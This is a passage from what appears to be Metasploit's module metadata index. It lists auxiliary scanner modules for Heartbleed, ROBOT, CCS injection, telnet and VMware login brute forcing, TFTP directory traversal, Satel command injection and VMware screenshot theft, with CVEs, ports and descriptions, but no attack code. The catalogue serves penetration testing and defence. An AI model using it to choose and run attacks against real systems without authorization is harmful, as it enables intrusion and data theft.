"description": "Some TLS implementations handle errors processing RSA key exchanges and\n encryption (PKCS #1 v1.5 messages) in a broken way that leads to an\n adaptive chosen-ciphertext attack. Attackers cannot recover a server's\n private key, but they can decrypt and sign messages with it. A strong\n oracle occurs when the TLS server does not strictly check message\n formatting and needs less than a million requests on average to decode\n a given ciphertext. A weak oracle server strictly checks message\n formatting and often requires many more requests to perform the attack.\n\n This module requires Python 3 with the gmpy2 and cryptography packages\n to be present.",
"references": [
"CVE-2017-6168",
"CVE-2017-17382",
"CVE-2017-17427",
"CVE-2017-17428",
"CVE-2017-12373",
"CVE-2017-13098",
"CVE-2017-1000385",
"CVE-2017-13099",
"CVE-2016-6883",
"CVE-2012-5081",
"URL-https://robotattack.org",
"URL-https://eprint.iacr.org/2017/1189",
"URL-https://github.com/robotattackorg/robot-detect"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-27 16:06:07 +0000",
"path": "/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py",
"is_install_path": true,
"ref_name": "scanner/ssl/bleichenbacher_oracle",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"ROBOT",
"Adaptive chosen-ciphertext attack"
]
}
},
"auxiliary_scanner/ssl/openssl_ccs": {
"name": "OpenSSL Server-Side ChangeCipherSpec Injection Scanner",
"full_name": "auxiliary/scanner/ssl/openssl_ccs",
"rank": 300,
"disclosure_date": "2014-06-05",
"type": "auxiliary",
"author": [
"Masashi Kikuchi",
"Craig Young <CYoung@tripwire.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module checks for the OpenSSL ChangeCipherSpec (CCS)\n Injection vulnerability. The problem exists in the handling of early\n CCS messages during session negotiation. Vulnerable installations of OpenSSL accept\n them, while patched implementations do not. If successful, an attacker positioned between a\n vulnerable client and a vulnerable server can leverage this vulnerability to perform a\n man-in-the-middle (MITM) attack by downgrading the cipher spec between them. This issue was\n first reported in early June, 2014.",
"references": [
"CVE-2014-0224",
"URL-http://ccsinjection.lepidum.co.jp/",
"URL-http://ccsinjection.lepidum.co.jp/blog/2014-06-05/CCS-Injection-en/index.html",
"URL-http://www.tripwire.com/state-of-security/incident-detection/detection-script-for-cve-2014-0224-openssl-cipher-change-spec-injection/",
"URL-https://www.imperialviolet.org/2014/06/05/earlyccs.html"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ssl/openssl_ccs.rb",
"is_install_path": true,
"ref_name": "scanner/ssl/openssl_ccs",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssl/openssl_heartbleed": {
"name": "OpenSSL Heartbeat (Heartbleed) Information Leak",
"full_name": "auxiliary/scanner/ssl/openssl_heartbleed",
"rank": 300,
"disclosure_date": "2014-04-07",
"type": "auxiliary",
"author": [
"Neel Mehta",
"Riku",
"Antti",
"Matti",
"Jared Stafford <jspenguin@jspenguin.org>",
"FiloSottile",
"Christian Mehlmauer <FireFart@gmail.com>",
"wvu <wvu@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>",
"Sebastiano Di Paola",
"Tom Sellers",
"jjarmoc",
"Ben Buchanan",
"herself"
],
"description": "This module implements the OpenSSL Heartbleed attack. The problem\n exists in the handling of heartbeat requests, where a fake length can\n be used to leak memory data in the response. Services that support\n STARTTLS may also be vulnerable.\n\n The module supports several actions, allowing for scanning, dumping of\n memory contents to loot, and private key recovery.\n\n The LEAK_COUNT option can be used to specify leaks per SCAN or DUMP.\n\n The repeat command can be used to make running the SCAN or DUMP many\n times more powerful. As in:\n repeat -t 60 run; sleep 2\n To run every two seconds for one minute.",
"references": [
"CVE-2014-0160",
"US-CERT-VU-720951",
"URL-https://www.us-cert.gov/ncas/alerts/TA14-098A",
"URL-http://heartbleed.com/",
"URL-https://github.com/FiloSottile/Heartbleed",
"URL-https://gist.github.com/takeshixx/10107280",
"URL-http://filippo.io/Heartbleed/"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb",
"is_install_path": true,
"ref_name": "scanner/ssl/openssl_heartbleed",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Heartbleed"
]
}
},
"auxiliary_scanner/steam/server_info": {
"name": "Gather Steam Server Information",
"full_name": "auxiliary/scanner/steam/server_info",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module uses the A2S_INFO request to obtain information from a Steam server.",
"references": [
"URL-https://developer.valvesoftware.com/wiki/Server_queries#A2S_INFO"
],
"platform": "",
"arch": "",
"rport": 27015,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/steam/server_info.rb",
"is_install_path": true,
"ref_name": "scanner/steam/server_info",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/telephony/wardial": {
"name": "Wardialer",
"full_name": "auxiliary/scanner/telephony/wardial",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"I)ruid <druid@caughq.org>"
],
"description": "Scan for dial-up systems that are connected to modems and answer telephony indials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/telephony/wardial.rb",
"is_install_path": true,
"ref_name": "scanner/telephony/wardial",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/telnet/brocade_enable_login": {
"name": "Brocade Enable Login Check Scanner",
"full_name": "auxiliary/scanner/telnet/brocade_enable_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"h00die <mike@shorebreaksecurity.com>"
],
"description": "This module will test a range of Brocade network devices for\n privileged logins and report successes. The device authentication mode\n must be set as 'aaa authentication enable default local'.\n Telnet authentication, e.g. 'enable telnet authentication', should not\n be enabled in the device configuration.\n\n This module has been tested against the following devices:\n ICX6450-24 SWver 07.4.00bT311,\n FastIron WS 624 SWver 07.2.02fT7e1",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 23,
"autofilter_ports": [
23
],
"autofilter_services": [
"telnet"
],
"targets": null,
"mod_time": "2018-12-12 13:57:31 +0000",
"path": "/modules/auxiliary/scanner/telnet/brocade_enable_login.rb",
"is_install_path": true,
"ref_name": "scanner/telnet/brocade_enable_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/telnet/lantronix_telnet_password": {
"name": "Lantronix Telnet Password Recovery",
"full_name": "auxiliary/scanner/telnet/lantronix_telnet_password",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"jgor"
],
"description": "This module retrieves the setup record from Lantronix serial-to-ethernet\n devices via the config port (30718/udp, enabled by default) and extracts the\n telnet password. It has been tested successfully on a Lantronix Device Server\n with software version V5.8.0.1.",
"references": [
],
"platform": "",
"arch": "",
"rport": 30718,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb",
"is_install_path": true,
"ref_name": "scanner/telnet/lantronix_telnet_password",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/telnet/lantronix_telnet_version": {
"name": "Lantronix Telnet Service Banner Detection",
"full_name": "auxiliary/scanner/telnet/lantronix_telnet_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "Detect Lantronix telnet services",
"references": [
],
"platform": "",
"arch": "",
"rport": 9999,
"autofilter_ports": [
23
],
"autofilter_services": [
"telnet"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb",
"is_install_path": true,
"ref_name": "scanner/telnet/lantronix_telnet_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/telnet/satel_cmd_exec": {
"name": "Satel Iberia SenNet Data Logger and Electricity Meters Command Injection Vulnerability",
"full_name": "auxiliary/scanner/telnet/satel_cmd_exec",
"rank": 300,
"disclosure_date": "2017-04-07",
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module exploits an OS Command Injection vulnerability in Satel Iberia SenNet Data Loggers & Electricity Meters\n to perform arbitrary command execution as 'root'.",
"references": [
"CVE-2017-6048",
"URL-https://ipositivesecurity.com/2017/04/07/sennet-data-logger-appliances-and-electricity-meters-multiple-vulnerabilties/",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-17-131-02"
],
"platform": "",
"arch": "",
"rport": 5000,
"autofilter_ports": [
23
],
"autofilter_services": [
"telnet"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/telnet/satel_cmd_exec.rb",
"is_install_path": true,
"ref_name": "scanner/telnet/satel_cmd_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/telnet/telnet_encrypt_overflow": {
"name": "Telnet Service Encryption Key ID Overflow Detection",
"full_name": "auxiliary/scanner/telnet/telnet_encrypt_overflow",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jaime Penalba Estebanez <jpenalbae@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "Detect telnet services vulnerable to the encrypt option Key ID overflow (BSD-derived telnetd)",
"references": [
"BID-51182",
"CVE-2011-4862",
"EDB-18280",
"URL-https://community.rapid7.com/community/metasploit/blog/2011/12/28/more-fun-with-bsd-derived-telnet-daemons"
],
"platform": "",
"arch": "",
"rport": 23,
"autofilter_ports": [
23
],
"autofilter_services": [
"telnet"
],
"targets": null,
"mod_time": "2018-02-14 09:19:28 +0000",
"path": "/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb",
"is_install_path": true,
"ref_name": "scanner/telnet/telnet_encrypt_overflow",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/telnet/telnet_login": {
"name": "Telnet Login Check Scanner",
"full_name": "auxiliary/scanner/telnet/telnet_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "This module will test a telnet login on a range of machines and\n report successful logins. If you have loaded a database plugin\n and connected to a database this module will record successful\n logins and hosts so you can track your access.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 23,
"autofilter_ports": [
23
],
"autofilter_services": [
"telnet"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/telnet/telnet_login.rb",
"is_install_path": true,
"ref_name": "scanner/telnet/telnet_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/telnet/telnet_ruggedcom": {
"name": "RuggedCom Telnet Password Generator",
"full_name": "auxiliary/scanner/telnet/telnet_ruggedcom",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Borja Merino <bmerinofe@gmail.com>",
"jc"
],
"description": "This module will calculate the password for the hard-coded hidden username\n \"factory\" in the RuggedCom Rugged Operating System (ROS). The password is\n dynamically generated based on the device's MAC address.",
"references": [
"CVE-2012-1803",
"EDB-18779",
"US-CERT-VU-889195"
],
"platform": "",
"arch": "",
"rport": 23,
"autofilter_ports": [
23
],
"autofilter_services": [
"telnet"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb",
"is_install_path": true,
"ref_name": "scanner/telnet/telnet_ruggedcom",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/telnet/telnet_version": {
"name": "Telnet Service Banner Detection",
"full_name": "auxiliary/scanner/telnet/telnet_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Detect telnet services",
"references": [
],
"platform": "",
"arch": "",
"rport": 23,
"autofilter_ports": [
23
],
"autofilter_services": [
"telnet"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/telnet/telnet_version.rb",
"is_install_path": true,
"ref_name": "scanner/telnet/telnet_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/teradata/teradata_odbc_login": {
"name": "Teradata ODBC Login Scanner Module",
"full_name": "auxiliary/scanner/teradata/teradata_odbc_login",
"rank": 300,
"disclosure_date": "2018-03-30",
"type": "auxiliary",
"author": [
"Ted Raffle (actuated)"
],
"description": "Login scanner module for ODBC connections to Teradata databases.\n\n Port specification (TCP 1025 by default) is not necessary for ODBC connections.\n\n Blank passwords are not supported by ODBC connections.\n\n Requires ODBC driver and Python Teradata module.",
"references": [
"URL-https://developer.teradata.com/tools/reference/teradata-python-module",
"URL-https://downloads.teradata.com/download/connectivity/odbc-driver/linux"
],
"platform": "",
"arch": "",
"rport": 1025,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-27 16:06:07 +0000",
"path": "/modules/auxiliary/scanner/teradata/teradata_odbc_login.py",
"is_install_path": true,
"ref_name": "scanner/teradata/teradata_odbc_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"AKA": [
"Teradata ODBC Login Scanner"
]
}
},
"auxiliary_scanner/tftp/ipswitch_whatsupgold_tftp": {
"name": "IpSwitch WhatsUp Gold TFTP Directory Traversal",
"full_name": "auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp",
"rank": 300,
"disclosure_date": "2011-12-12",
"type": "auxiliary",
"author": [
"Prabhu S Angadi",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability in the IpSwitch WhatsUp\n Gold TFTP service.",
"references": [
"OSVDB-77455",
"BID-50890",
"EDB-18189",
"URL-http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt",
"CVE-2011-4722"
],
"platform": "",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb",
"is_install_path": true,
"ref_name": "scanner/tftp/ipswitch_whatsupgold_tftp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/tftp/netdecision_tftp": {
"name": "NetDecision 4.2 TFTP Directory Traversal",
"full_name": "auxiliary/scanner/tftp/netdecision_tftp",
"rank": 300,
"disclosure_date": "2009-05-16",
"type": "auxiliary",
"author": [
"Rob Kraus",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability in the NetDecision 4.2\n TFTP service.",
"references": [
"CVE-2009-1730",
"OSVDB-54607",
"BID-35002"
],
"platform": "",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/tftp/netdecision_tftp.rb",
"is_install_path": true,
"ref_name": "scanner/tftp/netdecision_tftp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/tftp/tftpbrute": {
"name": "TFTP Brute Forcer",
"full_name": "auxiliary/scanner/tftp/tftpbrute",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"antoine"
],
"description": "This module uses a dictionary to brute force valid TFTP image names from a TFTP server.",
"references": [
],
"platform": "",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/tftp/tftpbrute.rb",
"is_install_path": true,
"ref_name": "scanner/tftp/tftpbrute",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ubiquiti/ubiquiti_discover": {
"name": "Ubiquiti Discovery Scanner",
"full_name": "auxiliary/scanner/ubiquiti/ubiquiti_discover",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "Detects Ubiquiti devices using a UDP discovery service",
"references": [
"URL-https://www.us-cert.gov/ncas/alerts/TA14-017A",
"URL-https://community.ubnt.com/t5/airMAX-General-Discussion/airOS-airMAX-and-management-access/td-p/2654023",
"URL-https://blog.rapid7.com/2019/02/01/ubiquiti-discovery-service-exposures/"
],
"platform": "",
"arch": "",
"rport": 10001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-02-01 14:49:14 +0000",
"path": "/modules/auxiliary/scanner/ubiquiti/ubiquiti_discover.rb",
"is_install_path": true,
"ref_name": "scanner/ubiquiti/ubiquiti_discover",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/udp/udp_amplification": {
"name": "UDP Amplification Scanner",
"full_name": "auxiliary/scanner/udp/udp_amplification",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "Detect UDP endpoints with UDP amplification vulnerabilities",
"references": [
"CVE-2013-5211",
"URL-https://www.us-cert.gov/ncas/alerts/TA14-017A"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/udp/udp_amplification.rb",
"is_install_path": true,
"ref_name": "scanner/udp/udp_amplification",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/upnp/ssdp_amp": {
"name": "SSDP ssdp:all M-SEARCH Amplification Scanner",
"full_name": "auxiliary/scanner/upnp/ssdp_amp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "Discover SSDP amplification possibilities",
"references": [
"CVE-2013-5211",
"URL-https://www.us-cert.gov/ncas/alerts/TA14-017A"
],
"platform": "",
"arch": "",
"rport": 1900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/upnp/ssdp_amp.rb",
"is_install_path": true,
"ref_name": "scanner/upnp/ssdp_amp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/upnp/ssdp_msearch": {
"name": "UPnP SSDP M-SEARCH Information Discovery",
"full_name": "auxiliary/scanner/upnp/ssdp_msearch",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "Discover information from UPnP-enabled systems",
"references": [
"CVE-2012-5958",
"CVE-2012-5959",
"CVE-2013-0230",
"CVE-2013-0229"
],
"platform": "",
"arch": "",
"rport": 1900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/upnp/ssdp_msearch.rb",
"is_install_path": true,
"ref_name": "scanner/upnp/ssdp_msearch",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/varnish/varnish_cli_file_read": {
"name": "Varnish Cache CLI File Read",
"full_name": "auxiliary/scanner/varnish/varnish_cli_file_read",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"patrick",
"h00die <mike@shorebreaksecurity.com>"
],
"description": "This module attempts to read the first line of a file by abusing the error message when\n compiling a file with vcl.load.",
"references": [
"OSVDB-67670",
"CVE-2009-2936",
"EDB-35581",
"URL-https://www.varnish-cache.org/trac/wiki/CLI"
],
"platform": "",
"arch": "",
"rport": 6082,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-03-09 11:25:13 +0000",
"path": "/modules/auxiliary/scanner/varnish/varnish_cli_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/varnish/varnish_cli_file_read",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/varnish/varnish_cli_login": {
"name": "Varnish Cache CLI Login Utility",
"full_name": "auxiliary/scanner/varnish/varnish_cli_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>",
"h00die <mike@shorebreaksecurity.com>"
],
"description": "This module attempts to log in to the Varnish Cache (varnishd) CLI instance using a brute-force\n list of passwords.",
"references": [
"OSVDB-67670",
"CVE-2009-2936",
"EDB-35581",
"URL-https://www.varnish-cache.org/trac/wiki/CLI"
],
"platform": "",
"arch": "",
"rport": 6082,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/scanner/varnish/varnish_cli_login.rb",
"is_install_path": true,
"ref_name": "scanner/varnish/varnish_cli_login",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vmware/esx_fingerprint": {
"name": "VMWare ESX/ESXi Fingerprint Scanner",
"full_name": "auxiliary/scanner/vmware/esx_fingerprint",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module accesses the web API interfaces for VMware ESX/ESXi servers\n and attempts to identify version information for that server.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vmware/esx_fingerprint.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/esx_fingerprint",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vmware/vmauthd_login": {
"name": "VMWare Authentication Daemon Login Scanner",
"full_name": "auxiliary/scanner/vmware/vmauthd_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will test vmauthd logins on a range of machines and\n report successful logins.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 902,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmauthd_login.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmauthd_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vmware/vmauthd_version": {
"name": "VMWare Authentication Daemon Version Scanner",
"full_name": "auxiliary/scanner/vmware/vmauthd_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "This module will identify information about a host through the\n vmauthd service.",
"references": [
],
"platform": "",
"arch": "",
"rport": 902,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmauthd_version.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmauthd_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vmware/vmware_enum_permissions": {
"name": "VMWare Enumerate Permissions",
"full_name": "auxiliary/scanner/vmware/vmware_enum_permissions",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will log into the Web API of VMware and try to enumerate\n all the user/group permissions. Unlike vmware_enum_users, this lists only\n users and groups that specifically have permissions defined within\n the VMware product.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmware_enum_permissions",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/vmware/vmware_enum_sessions": {
"name": "VMWare Enumerate Active Sessions",
"full_name": "auxiliary/scanner/vmware/vmware_enum_sessions",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will log into the Web API of VMWare and try to enumerate\n all the login sessions.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmware_enum_sessions",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/vmware/vmware_enum_users": {
"name": "VMWare Enumerate User Accounts",
"full_name": "auxiliary/scanner/vmware/vmware_enum_users",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will log into the Web API of VMWare and try to enumerate\n all the user accounts. If the VMware instance is connected to one or\n more domains, it will try to enumerate domain users as well.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmware_enum_users.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmware_enum_users",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/vmware/vmware_enum_vms": {
"name": "VMWare Enumerate Virtual Machines",
"full_name": "auxiliary/scanner/vmware/vmware_enum_vms",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmware_enum_vms",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/vmware/vmware_host_details": {
"name": "VMWare Enumerate Host Details",
"full_name": "auxiliary/scanner/vmware/vmware_host_details",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module attempts to enumerate information about the host systems through the VMWare web API.\n This can include information about the hardware installed on the host machine.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmware_host_details.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmware_host_details",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/vmware/vmware_http_login": {
"name": "VMWare Web Login Scanner",
"full_name": "auxiliary/scanner/vmware/vmware_http_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module attempts to authenticate to the VMware HTTP service\n for VMware Server, ESX, and ESXi.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-11-01 07:26:12 +0000",
"path": "/modules/auxiliary/scanner/vmware/vmware_http_login.rb",
"is_install_path": true,
"ref_name": "scanner/vmware/vmware_http_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/vmware/vmware_screenshot_stealer": {
"name": "VMWare Screenshot Stealer",
"full_name": "auxiliary/scanner/vmware/vmware_screenshot_stealer",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module uses supplied login credentials to connect to VMWare via\n the web interface. It then searches through the datastores looking for screenshots.\n It will download any screenshots it finds and save them as loot.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
